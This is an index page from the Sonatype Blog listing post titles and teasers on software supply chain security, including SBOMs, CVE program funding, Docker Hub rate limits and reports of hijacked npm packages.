How SBOMs power secure software acquisition | Sonatype Blog
CISA's Supply Chain Integrity Month reminds us of an undeniable truth about modern software development: transparency in software supply chains is no longer optional. The theme of week 4 is "Transparency: Securing ...
Build smarter with AI and your software supply chain
AI adoption is reshaping how software gets built. From coding assistants to full-fledged agentic AI applications, developers now routinely rely on artificial intelligence in their workflows. But a subtler shift is also ...
​Elevate your organization’s success: Submissions now open for the 2025 Sonatype Elevate Awards
We are thrilled to announce that the 2025 Sonatype Elevate Awards are officially open for submissions ...
Shadow downloads – How developers have become the new perimeter
With great power comes great responsibility ...
5 reasons to not miss Sonatype at RSAC 2025
RSA Conference (RSAC) brings together cybersecurity practitioners from across the globe to learn about the latest cybersecurity defense strategies and tools, connect with industry peers, and share knowledge about the threat landscape ...
What’s happening with MITRE and the CVE program uncertainty
Yesterday's headlines have sent ripples through the cybersecurity and software supply chain communities: MITRE announced that U.S. government funding for the CVE (Common Vulnerabilities and Exposures) database was set to expire today ...
Open Source Malware Index Q1 2025: Data exfil threats rising sharply
Sonatype's ongoing mission is to equip organizations with the most up-to-date information on open source security threats. As part of that commitment, we will be sharing data and insights on a quarterly ...
Using Sonatype Nexus Repository with the new Docker Hub rate limits
Beginning April 1, 2025, Docker is going to introduce new pull rate limits in Docker Hub, which follow previous limits introduced in 2020. In this blog, we will discuss how Docker Hub's ...
How SBOMs drive a smarter SCA strategy
Modern software is largely assembled from open source components, constituting up to 90% of today's codebases. Managing the security and compliance risks associated with this external code is no longer optional — ...
Multiple crypto packages hijacked, turned into info-stealers
Sonatype has identified multiple npm cryptocurrency packages, latest versions of which have been hijacked and altered to steal sensitive information such as environment variables from the target victims ...
